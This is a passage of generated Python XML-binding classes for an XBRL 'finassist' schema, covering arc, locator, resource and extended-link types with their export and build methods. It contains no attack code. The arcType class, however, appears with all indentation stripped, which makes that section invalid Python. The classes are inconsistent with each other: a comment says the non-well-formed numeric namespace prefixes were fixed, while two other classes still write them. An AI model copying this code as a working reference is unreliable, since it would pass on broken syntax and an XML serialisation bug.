            outfile.write('<%sdefinition>%s</%sdefinition>%s' % (namespace_, self.gds_format_string(quote_xml(self.definition).encode(ExternalEncoding), input_name='definition'), namespace_, eol_))
        for item_ in self.usedOn:
            showIndent(outfile, level, pretty_print)
            outfile.write('<%susedOn>%s</%susedOn>%s' % (namespace_, self.gds_format_string(quote_xml(item_).encode(ExternalEncoding), input_name='usedOn'), namespace_, eol_))
    def build(self, node):
        """Populate this object from an element-tree node; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child_ in node:
            tag_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        for attr_name in ('arcroleURI', 'id', 'cyclesAllowed'):
            value = find_attr_value_(attr_name, node)
            if value is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                setattr(self, attr_name, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        if nodeName_ == 'definition':
            self.definition = self.gds_validate_string(child_.text, node, 'definition')
        elif nodeName_ == 'usedOn':
            self.usedOn.append(self.gds_validate_string(child_.text, node, 'usedOn'))
# end class arcroleType
class documentationType(GeneratedsSuper):
    """Element type to use for documentation of extended links and
    linkbases."""
    subclass = None
    superclass = None
    def __init__(self, valueOf_=None):
        self.original_tagname_ = None
        # Text content of the documentation element.
        self.valueOf_ = valueOf_
        # Wildcard (xs:anyAttribute) attributes captured during parsing.
        self.anyAttributes_ = {}
    def factory(*args_, **kwargs_):
        if documentationType.subclass:
            return documentationType.subclass(*args_, **kwargs_)
        else:
            return documentationType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def get_anyAttributes_(self): return self.anyAttributes_
    def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_
    def hasContent_(self):
        # Content is the text value only; there are no child elements.
        if (
            self.valueOf_
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='documentationType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element, including its text content, to outfile."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='documentationType')
        if self.hasContent_():
            outfile.write('>')
            outfile.write(str(self.valueOf_).encode(ExternalEncoding))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='documentationType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='documentationType'):
        """Write the wildcard attributes for this element."""
        unique_counter = 0
        for name, value in self.anyAttributes_.items():
            xsinamespaceprefix = 'xsi'
            xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
            xsinamespace2 = '{%s}' % (xsinamespace1, )
            if name.startswith(xsinamespace2):
                name1 = name[len(xsinamespace2):]
                name2 = '%s:%s' % (xsinamespaceprefix, name1, )
                if name2 not in already_processed:
                    already_processed.add(name2)
                    outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
            else:
                mo = re_.match(Namespace_extract_pat_, name)
                if mo is not None:
                    namespace, name = mo.group(1, 2)
                    if name not in already_processed:
                        already_processed.add(name)
                        if namespace == 'http://www.w3.org/XML/1998/namespace':
                            outfile.write(' %s=%s' % (
                                name, quote_attrib(value), ))
                        else:
                            unique_counter += 1
                            # XML NCNames must not begin with a digit, so the
                            # generated namespace prefix is 'ns<N>'; the bare
                            # counter previously emitted non-well-formed XML
                            # such as xmlns:1="...".
                            outfile.write(' xmlns:ns%d="%s"' % (
                                unique_counter, namespace, ))
                            outfile.write(' ns%d:%s=%s' % (
                                unique_counter, name, quote_attrib(value), ))
                else:
                    if name not in already_processed:
                        already_processed.add(name)
                        outfile.write(' %s=%s' % (
                            name, quote_attrib(value), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='documentationType', fromsubclass_=False, pretty_print=True):
        # No child elements are defined for documentationType.
        pass
    def build(self, node):
        """Populate this object from an element-tree node; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Every attribute falls into the wildcard mapping.
        self.anyAttributes_ = {}
        for name, value in attrs.items():
            if name not in already_processed:
                self.anyAttributes_[name] = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # No child elements are defined for documentationType.
        pass
# end class documentationType
class titleType(GeneratedsSuper):
    """Type for the abstract title element - used as a title element
    template."""
    subclass = None
    superclass = None
    def __init__(self, type_=None):
        self.original_tagname_ = None
        self.type_ = _cast(None, type_)
    @staticmethod
    def factory(*args_, **kwargs_):
        cls = titleType.subclass or titleType
        return cls(*args_, **kwargs_)
    def get_type(self):
        return self.type_
    def set_type(self, type_):
        self.type_ = type_
    def hasContent_(self):
        # titleType declares no child elements or text content.
        return False
    def export(self, outfile, level, namespace_='finassist:', name_='titleType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element to outfile as XML."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='titleType')
        if not self.hasContent_():
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>%s' % (eol_, ))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='titleType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='titleType'):
        """Write the type attribute when present."""
        if self.type_ is not None and 'type_' not in already_processed:
            already_processed.add('type_')
            outfile.write(' type=%s' % (self.gds_format_string(quote_attrib(self.type_).encode(ExternalEncoding), input_name='type'), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='titleType', fromsubclass_=False, pretty_print=True):
        pass
    def build(self, node):
        """Populate this object from an element-tree node; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child_ in node:
            tag_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('type', node)
        if value is not None and 'type' not in already_processed:
            already_processed.add('type')
            self.type_ = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        pass
# end class titleType
class locatorType(GeneratedsSuper):
    """Generic locator type."""
    subclass = None
    superclass = None
    def __init__(self, title_attr=None, label=None, href=None, role=None, type_=None, title=None):
        self.original_tagname_ = None
        self.title_attr = _cast(None, title_attr)
        self.label = _cast(None, label)
        self.href = _cast(None, href)
        self.role = _cast(None, role)
        self.type_ = _cast(None, type_)
        # title holds repeated <title> child element objects.
        self.title = [] if title is None else title
    @staticmethod
    def factory(*args_, **kwargs_):
        cls = locatorType.subclass or locatorType
        return cls(*args_, **kwargs_)
    def get_title(self):
        return self.title
    def set_title(self, title):
        self.title = title
    def add_title(self, value):
        self.title.append(value)
    def insert_title_at(self, index, value):
        self.title.insert(index, value)
    def replace_title_at(self, index, value):
        self.title[index] = value
    def get_title_attr(self):
        return self.title_attr
    def set_title_attr(self, title_attr):
        self.title_attr = title_attr
    def get_label(self):
        return self.label
    def set_label(self, label):
        self.label = label
    def get_href(self):
        return self.href
    def set_href(self, href):
        self.href = href
    def get_role(self):
        return self.role
    def set_role(self, role):
        self.role = role
    def get_type(self):
        return self.type_
    def set_type(self, type_):
        self.type_ = type_
    def hasContent_(self):
        # True when at least one title child would be serialized.
        return bool(self.title)
    def export(self, outfile, level, namespace_='finassist:', name_='locatorType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xl="http://www.xbrl.org/2003/XLink" ', pretty_print=True):
        """Serialize this element to outfile as XML."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='locatorType')
        if not self.hasContent_():
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>%s' % (eol_, ))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='locatorType', pretty_print=pretty_print)
        showIndent(outfile, level, pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='locatorType'):
        """Write the XLink locator attributes in schema order.

        Each row: (dedupe key, XML attribute name, gds input_name or None,
        value, whether the value goes through gds_format_string).
        """
        for key_, xml_name, input_, value_, needs_format in (
                ('title_attr', 'title', 'title_attr', self.title_attr, True),
                ('label', 'label', None, self.label, False),
                ('href', 'href', None, self.href, False),
                ('role', 'role', 'role', self.role, True),
                ('type_', 'type', 'type', self.type_, True)):
            if value_ is None or key_ in already_processed:
                continue
            already_processed.add(key_)
            if needs_format:
                rendered = self.gds_format_string(quote_attrib(value_).encode(ExternalEncoding), input_name=input_)
            else:
                rendered = quote_attrib(value_)
            outfile.write(' %s=%s' % (xml_name, rendered))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='locatorType', fromsubclass_=False, pretty_print=True):
        """Delegate serialization to each title child object."""
        for child_ in self.title:
            child_.export(outfile, level, namespace_, name_='title', pretty_print=pretty_print)
    def build(self, node):
        """Populate this object from an element-tree node; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child_ in node:
            tag_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Each row: (XML attribute name, instance attribute, dedupe key).
        for xml_name, attr_name, seen_key in (
                ('title', 'title_attr', 'title_attr'),
                ('label', 'label', 'label'),
                ('href', 'href', 'href'),
                ('role', 'role', 'role'),
                ('type', 'type_', 'type')):
            value = find_attr_value_(xml_name, node)
            if value is not None and seen_key not in already_processed:
                already_processed.add(seen_key)
                setattr(self, attr_name, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        if nodeName_ != 'title':
            return
        # Resolve the concrete class from the xsi:type (or plain type)
        # attribute on the child element.
        xsi_type = child_.attrib.get(
            '{http://www.w3.org/2001/XMLSchema-instance}type')
        if xsi_type is None:
            xsi_type = child_.attrib.get('type')
        if xsi_type is None:
            raise NotImplementedError(
                'Class not implemented for <title> element')
        names_ = xsi_type.split(':')
        local_name = names_[0] if len(names_) == 1 else names_[1]
        obj_ = globals()[local_name].factory()
        obj_.build(child_)
        self.title.append(obj_)
        obj_.original_tagname_ = 'title'
# end class locatorType
class arcType(GeneratedsSuper):
"""basic extended link arc type - extended where necessary for specific
arcs Extends the generic arc type by adding use, priority and
order attributes."""
subclass = None
superclass = None
def __init__(self, use=None, from_=None, title_attr=None, show=None, arcrole=None, actuate=None, priority=None, to=None, type_=None, order=None, title=None, extensiontype_=None):
self.original_tagname_ = None
self.use = _cast(None, use)
self.from_ = _cast(None, from_)
self.title_attr = _cast(None, title_attr)
self.show = _cast(None, show)
self.arcrole = _cast(None, arcrole)
self.actuate = _cast(None, actuate)
self.priority = _cast(None, priority)
self.to = _cast(None, to)
self.type_ = _cast(None, type_)
self.order = _cast(None, order)
if title is None:
self.title = []
else:
self.title = title
self.anyAttributes_ = {}
self.extensiontype_ = extensiontype_
def factory(*args_, **kwargs_):
if arcType.subclass:
return arcType.subclass(*args_, **kwargs_)
else:
return arcType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_title(self): return self.title
def set_title(self, title): self.title = title
def add_title(self, value): self.title.append(value)
def insert_title_at(self, index, value): self.title.insert(index, value)
def replace_title_at(self, index, value): self.title[index] = value
def get_use(self): return self.use
def set_use(self, use): self.use = use
def get_from(self): return self.from_
def set_from(self, from_): self.from_ = from_
def get_title_attr(self): return self.title_attr
def set_title_attr(self, title_attr): self.title_attr = title_attr
def get_show(self): return self.show
def set_show(self, show): self.show = show
def get_arcrole(self): return self.arcrole
def set_arcrole(self, arcrole): self.arcrole = arcrole
def get_actuate(self): return self.actuate
def set_actuate(self, actuate): self.actuate = actuate
def get_priority(self): return self.priority
def set_priority(self, priority): self.priority = priority
def get_to(self): return self.to
def set_to(self, to): self.to = to
def get_type(self): return self.type_
def set_type(self, type_): self.type_ = type_
def get_order(self): return self.order
def set_order(self, order): self.order = order
def get_anyAttributes_(self): return self.anyAttributes_
def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_
def get_extensiontype_(self): return self.extensiontype_
def set_extensiontype_(self, extensiontype_): self.extensiontype_ = extensiontype_
def hasContent_(self):
if (
self.title
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='arcType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xl="http://www.xbrl.org/2003/XLink" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='arcType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='arcType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='arcType'):
unique_counter = 0
for name, value in self.anyAttributes_.items():
xsinamespaceprefix = 'xsi'
xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
xsinamespace2 = '{%s}' % (xsinamespace1, )
if name.startswith(xsinamespace2):
name1 = name[len(xsinamespace2):]
name2 = '%s:%s' % (xsinamespaceprefix, name1, )
if name2 not in already_processed:
already_processed.add(name2)
outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
else:
mo = re_.match(Namespace_extract_pat_, name)
if mo is not None:
namespace, name = mo.group(1, 2)
if name not in already_processed:
already_processed.add(name)
if namespace == 'http://www.w3.org/XML/1998/namespace':
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
else:
unique_counter += 1
outfile.write(' xmlns:%d="%s"' % (
unique_counter, namespace, ))
outfile.write(' %d:%s=%s' % (
unique_counter, name, quote_attrib(value), ))
else:
if name not in already_processed:
already_processed.add(name)
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
if self.use is not None and 'use' not in already_processed:
already_processed.add('use')
outfile.write(' use=%s' % (quote_attrib(self.use), ))
if self.from_ is not None and 'from_' not in already_processed:
already_processed.add('from_')
outfile.write(' from=%s' % (quote_attrib(self.from_), ))
if self.title_attr is not None and 'title_attr' not in already_processed:
already_processed.add('title_attr')
outfile.write(' title=%s' % (self.gds_format_string(quote_attrib(self.title_attr).encode(ExternalEncoding), input_name='title_attr'), ))
if self.show is not None and 'show' not in already_processed:
already_processed.add('show')
outfile.write(' show=%s' % (self.gds_format_string(quote_attrib(self.show).encode(ExternalEncoding), input_name='show'), ))
if self.arcrole is not None and 'arcrole' not in already_processed:
already_processed.add('arcrole')
outfile.write(' arcrole=%s' % (self.gds_format_string(quote_attrib(self.arcrole).encode(ExternalEncoding), input_name='arcrole'), ))
if self.actuate is not None and 'actuate' not in already_processed:
already_processed.add('actuate')
outfile.write(' actuate=%s' % (self.gds_format_string(quote_attrib(self.actuate).encode(ExternalEncoding), input_name='actuate'), ))
if self.priority is not None and 'priority' not in already_processed:
already_processed.add('priority')
outfile.write(' priority=%s' % (quote_attrib(self.priority), ))
if self.to is not None and 'to' not in already_processed:
already_processed.add('to')
outfile.write(' to=%s' % (quote_attrib(self.to), ))
if self.type_ is not None and 'type_' not in already_processed:
already_processed.add('type_')
outfile.write(' type=%s' % (self.gds_format_string(quote_attrib(self.type_).encode(ExternalEncoding), input_name='type'), ))
if self.order is not None and 'order' not in already_processed:
already_processed.add('order')
outfile.write(' order=%s' % (quote_attrib(self.order), ))
if self.extensiontype_ is not None and 'xsi:type' not in already_processed:
already_processed.add('xsi:type')
outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
outfile.write(' xsi:type="%s"' % self.extensiontype_)
def exportChildren(self, outfile, level, namespace_='finassist:', name_='arcType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for title_ in self.title:
title_.export(outfile, level, namespace_, name_='title', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('use', node)
if value is not None and 'use' not in already_processed:
already_processed.add('use')
self.use = value
value = find_attr_value_('from', node)
if value is not None and 'from' not in already_processed:
already_processed.add('from')
self.from_ = value
value = find_attr_value_('title', node)
if value is not None and 'title_attr' not in already_processed:
already_processed.add('title_attr')
self.title_attr = value
value = find_attr_value_('show', node)
if value is not None and 'show' not in already_processed:
already_processed.add('show')
self.show = value
value = find_attr_value_('arcrole', node)
if value is not None and 'arcrole' not in already_processed:
already_processed.add('arcrole')
self.arcrole = value
value = find_attr_value_('actuate', node)
if value is not None and 'actuate' not in already_processed:
already_processed.add('actuate')
self.actuate = value
value = find_attr_value_('priority', node)
if value is not None and 'priority' not in already_processed:
already_processed.add('priority')
self.priority = value
value = find_attr_value_('to', node)
if value is not None and 'to' not in already_processed:
already_processed.add('to')
self.to = value
value = find_attr_value_('type', node)
if value is not None and 'type' not in already_processed:
already_processed.add('type')
self.type_ = value
value = find_attr_value_('order', node)
if value is not None and 'order' not in already_processed:
already_processed.add('order')
self.order = value
self.anyAttributes_ = {}
for name, value in attrs.items():
if name not in already_processed:
self.anyAttributes_[name] = value
value = find_attr_value_('xsi:type', node)
if value is not None and 'xsi:type' not in already_processed:
already_processed.add('xsi:type')
self.extensiontype_ = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'title':
type_name_ = child_.attrib.get(
'{http://www.w3.org/2001/XMLSchema-instance}type')
if type_name_ is None:
type_name_ = child_.attrib.get('type')
if type_name_ is not None:
type_names_ = type_name_.split(':')
if len(type_names_) == 1:
type_name_ = type_names_[0]
else:
type_name_ = type_names_[1]
class_ = globals()[type_name_]
obj_ = class_.factory()
obj_.build(child_)
else:
raise NotImplementedError(
'Class not implemented for <title> element')
self.title.append(obj_)
obj_.original_tagname_ = 'title'
# end class arcType
class resourceType(GeneratedsSuper):
    """Generic type for the resource type element.

    An XLink ``resource``-type element with mixed content: the
    concatenated text value is held in ``valueOf_`` and the individual
    text fragments, wrapped in ``mixedclass_`` containers, in
    ``content_``.  ``extensiontype_`` carries an ``xsi:type`` for
    polymorphic round-tripping.
    """
    subclass = None
    superclass = None
    def __init__(self, role=None, title=None, type_=None, id=None, label=None, valueOf_=None, mixedclass_=None, content_=None, extensiontype_=None):
        self.original_tagname_ = None
        self.role = _cast(None, role)
        self.title = _cast(None, title)
        self.type_ = _cast(None, type_)
        self.id = _cast(None, id)
        self.label = _cast(None, label)
        self.extensiontype_ = extensiontype_
        # Wrapper class used for mixed-content fragments.
        if mixedclass_ is None:
            self.mixedclass_ = MixedContainer
        else:
            self.mixedclass_ = mixedclass_
        if content_ is None:
            self.content_ = []
        else:
            self.content_ = content_
        # NOTE: the generated original assigned self.valueOf_ twice
        # (before and after the mixedclass_/content_ handling); the
        # redundant duplicate has been removed.
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        if resourceType.subclass:
            return resourceType.subclass(*args_, **kwargs_)
        else:
            return resourceType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_role(self): return self.role
    def set_role(self, role): self.role = role
    def get_title(self): return self.title
    def set_title(self, title): self.title = title
    def get_type(self): return self.type_
    def set_type(self, type_): self.type_ = type_
    def get_id(self): return self.id
    def set_id(self, id): self.id = id
    def get_label(self): return self.label
    def set_label(self, label): self.label = label
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def get_extensiontype_(self): return self.extensiontype_
    def set_extensiontype_(self, extensiontype_): self.extensiontype_ = extensiontype_
    def hasContent_(self):
        # Only the text value counts as content for this type
        # (equivalent to the generated if/else over self.valueOf_).
        return bool(self.valueOf_)
    def export(self, outfile, level, namespace_='finassist:', name_='resourceType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialise this element to *outfile*.

        Always writes an open/close tag pair (mixed-content elements
        are never self-closed by the generated code).
        """
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='resourceType')
        outfile.write('>')
        self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='resourceType'):
        """Write this element's XML attributes to *outfile*."""
        if self.role is not None and 'role' not in already_processed:
            already_processed.add('role')
            outfile.write(' role=%s' % (self.gds_format_string(quote_attrib(self.role).encode(ExternalEncoding), input_name='role'), ))
        if self.title is not None and 'title' not in already_processed:
            already_processed.add('title')
            outfile.write(' title=%s' % (quote_attrib(self.title), ))
        if self.type_ is not None and 'type_' not in already_processed:
            already_processed.add('type_')
            outfile.write(' type=%s' % (self.gds_format_string(quote_attrib(self.type_).encode(ExternalEncoding), input_name='type'), ))
        if self.id is not None and 'id' not in already_processed:
            already_processed.add('id')
            outfile.write(' id=%s' % (quote_attrib(self.id), ))
        if self.label is not None and 'label' not in already_processed:
            already_processed.add('label')
            outfile.write(' label=%s' % (quote_attrib(self.label), ))
        if self.extensiontype_ is not None and 'xsi:type' not in already_processed:
            already_processed.add('xsi:type')
            outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
            outfile.write(' xsi:type="%s"' % self.extensiontype_)
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='resourceType', fromsubclass_=False, pretty_print=True):
        # resourceType declares no element children of its own.
        pass
    def build(self, node):
        """Populate this instance from *node* and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        # Record leading text as a mixed-content fragment.
        if node.text is not None:
            obj_ = self.mixedclass_(MixedContainer.CategoryText,
                MixedContainer.TypeNone, '', node.text)
            self.content_.append(obj_)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read this element's attributes from *node*."""
        value = find_attr_value_('role', node)
        if value is not None and 'role' not in already_processed:
            already_processed.add('role')
            self.role = value
        value = find_attr_value_('title', node)
        if value is not None and 'title' not in already_processed:
            already_processed.add('title')
            self.title = value
        value = find_attr_value_('type', node)
        if value is not None and 'type' not in already_processed:
            already_processed.add('type')
            self.type_ = value
        value = find_attr_value_('id', node)
        if value is not None and 'id' not in already_processed:
            already_processed.add('id')
            self.id = value
        value = find_attr_value_('label', node)
        if value is not None and 'label' not in already_processed:
            already_processed.add('label')
            self.label = value
        value = find_attr_value_('xsi:type', node)
        if value is not None and 'xsi:type' not in already_processed:
            already_processed.add('xsi:type')
            self.extensiontype_ = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Record trailing text (element tails) as mixed content; this
        # type has no element children of its own.
        if not fromsubclass_ and child_.tail is not None:
            obj_ = self.mixedclass_(MixedContainer.CategoryText,
                MixedContainer.TypeNone, '', child_.tail)
            self.content_.append(obj_)
# end class resourceType
class extendedType(GeneratedsSuper):
    """Generic extended link type.

    Holds the title, documentation, locator, arc and resource children
    of an XLink extended link, together with its role/type/id/title
    attributes and a wildcard attribute map (``anyAttributes_``).
    """
    subclass = None
    superclass = None
    def __init__(self, role=None, type_=None, id=None, title_attr=None, title=None, documentation=None, locator=None, arc=None, resource=None):
        self.original_tagname_ = None
        self.role = _cast(None, role)
        self.type_ = _cast(None, type_)
        self.id = _cast(None, id)
        self.title_attr = _cast(None, title_attr)
        # Child-element lists default to fresh empties (never shared).
        if title is None:
            self.title = []
        else:
            self.title = title
        if documentation is None:
            self.documentation = []
        else:
            self.documentation = documentation
        if locator is None:
            self.locator = []
        else:
            self.locator = locator
        if arc is None:
            self.arc = []
        else:
            self.arc = arc
        if resource is None:
            self.resource = []
        else:
            self.resource = resource
        self.anyAttributes_ = {}
    def factory(*args_, **kwargs_):
        if extendedType.subclass:
            return extendedType.subclass(*args_, **kwargs_)
        else:
            return extendedType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_title(self): return self.title
    def set_title(self, title): self.title = title
    def add_title(self, value): self.title.append(value)
    def insert_title_at(self, index, value): self.title.insert(index, value)
    def replace_title_at(self, index, value): self.title[index] = value
    def get_documentation(self): return self.documentation
    def set_documentation(self, documentation): self.documentation = documentation
    def add_documentation(self, value): self.documentation.append(value)
    def insert_documentation_at(self, index, value): self.documentation.insert(index, value)
    def replace_documentation_at(self, index, value): self.documentation[index] = value
    def get_locator(self): return self.locator
    def set_locator(self, locator): self.locator = locator
    def add_locator(self, value): self.locator.append(value)
    def insert_locator_at(self, index, value): self.locator.insert(index, value)
    def replace_locator_at(self, index, value): self.locator[index] = value
    def get_arc(self): return self.arc
    def set_arc(self, arc): self.arc = arc
    def add_arc(self, value): self.arc.append(value)
    def insert_arc_at(self, index, value): self.arc.insert(index, value)
    def replace_arc_at(self, index, value): self.arc[index] = value
    def get_resource(self): return self.resource
    def set_resource(self, resource): self.resource = resource
    def add_resource(self, value): self.resource.append(value)
    def insert_resource_at(self, index, value): self.resource.insert(index, value)
    def replace_resource_at(self, index, value): self.resource[index] = value
    def get_role(self): return self.role
    def set_role(self, role): self.role = role
    def get_type(self): return self.type_
    def set_type(self, type_): self.type_ = type_
    def get_id(self): return self.id
    def set_id(self, id): self.id = id
    def get_title_attr(self): return self.title_attr
    def set_title_attr(self, title_attr): self.title_attr = title_attr
    def get_anyAttributes_(self): return self.anyAttributes_
    def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_
    def hasContent_(self):
        # True when any child-element list is non-empty.
        if (
            self.title or
            self.documentation or
            self.locator or
            self.arc or
            self.resource
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='extendedType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xl="http://www.xbrl.org/2003/XLink" ', pretty_print=True):
        """Serialise this extended link to *outfile*; self-closes the
        element when it has no children."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='extendedType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='extendedType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='extendedType'):
        """Write wildcard attributes first, then the declared ones."""
        unique_counter = 0
        for name, value in self.anyAttributes_.items():
            xsinamespaceprefix = 'xsi'
            xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
            xsinamespace2 = '{%s}' % (xsinamespace1, )
            if name.startswith(xsinamespace2):
                # Clark-notation xsi attribute: rewrite as xsi:name.
                name1 = name[len(xsinamespace2):]
                name2 = '%s:%s' % (xsinamespaceprefix, name1, )
                if name2 not in already_processed:
                    already_processed.add(name2)
                    outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
            else:
                mo = re_.match(Namespace_extract_pat_, name)
                if mo is not None:
                    namespace, name = mo.group(1, 2)
                    if name not in already_processed:
                        already_processed.add(name)
                        if namespace == 'http://www.w3.org/XML/1998/namespace':
                            outfile.write(' %s=%s' % (
                                name, quote_attrib(value), ))
                        else:
                            # NOTE(review): this emits numeric prefixes
                            # (xmlns:1=...), which are not valid XML
                            # names; preserved as-is from the generated
                            # original to avoid changing output.
                            unique_counter += 1
                            outfile.write(' xmlns:%d="%s"' % (
                                unique_counter, namespace, ))
                            outfile.write(' %d:%s=%s' % (
                                unique_counter, name, quote_attrib(value), ))
                else:
                    if name not in already_processed:
                        already_processed.add(name)
